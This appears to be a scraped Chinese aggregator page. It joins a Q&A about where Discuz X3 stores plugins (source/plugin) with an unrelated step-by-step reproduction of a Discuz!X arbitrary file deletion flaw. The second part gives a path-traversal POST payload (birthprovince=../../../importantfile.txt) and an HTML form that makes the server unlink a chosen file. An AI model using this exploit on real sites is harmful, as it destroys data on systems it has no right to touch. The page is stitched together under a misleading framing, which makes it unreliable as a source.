DISCUZ X3 DZ论坛X3版本插件在哪个文件夹?

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了DISCUZ X3 DZ论坛X3版本插件在哪个文件夹?相关的知识,希望对你有一定的参考价值。

因为以前的一个插件很好用,我的另一个新站点想用,但是现在不免费了,我想把以前的插件复制到这个新的论坛里,但是不知道在哪个文件夹,希望高手帮忙

参考技术A 在source/plugin/目录下

不是在/source/plugin/目录下

source是你的论坛主目录的绝对值本回答被提问者采纳
参考技术B source/plugin
x3也在这里 。追问

source文件夹下根本没有plugin这个文件夹,/source/plugin/你这个路径怎么来的

参考技术C 一个很简单的方法
看插件运行地址。之后空间去找运行程序的目录
参考技术D 在/source/plugin/目录下。追问

这是X2.5之前的版本,我想问一下X3的

追答

确认X3.0版本的插件目录也是在此目录下!

追问

source文件夹下根本没有plugin这个文件夹,/source/plugin/你这个路径怎么来的

追答

如果你使用的确实是discuzX3.0程序的话,目录下面肯定有的。
你可以下载官方源文件去验证。

Discuz!X前台任意文件删除漏洞重现

漏洞影响了Discuz 3.4 以下的所有版本。
该漏洞存在于upload/source/include/spacecp/spacecp_profile.php,文件中的submitcheck()函数。成功上传文件会跳转执行unlink这个函数。


1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e5

技术图片

2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5

技术图片

执行后会显示一片空白,你再刷新下或重新访问下就好了。
技术图片
技术图片

3.出生地被修改成要删除的文件。
最后构造表单执行删除文件

<form
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="720c16c3"/></p>
<input type="text" name="profilesubmit" value="1"/></p>
<input type="submit" value="Submit" />
</from>

技术图片

生成.html,上面的需要自己修改。
4.然后随便上传一张图片,就能删除自己要删除的。

技术图片

5.再访问回去看一下。

技术图片

以上是关于DISCUZ X3 DZ论坛X3版本插件在哪个文件夹?的主要内容,如果未能解决你的问题,请参考以下文章

Discuz!X3.2导航下拉菜单样式修改

Discuz X3.1 论坛修改的方法(门户的修改)

discuz x3.2论坛迁移方案

DZ X3 和 ECshop 通过uc_server实现会员同步整合教程.

Discuz!X3.1后台操作技巧(整合)

Discuz X3.2 分区 gid 完美伪静态方法 Apache/Nginx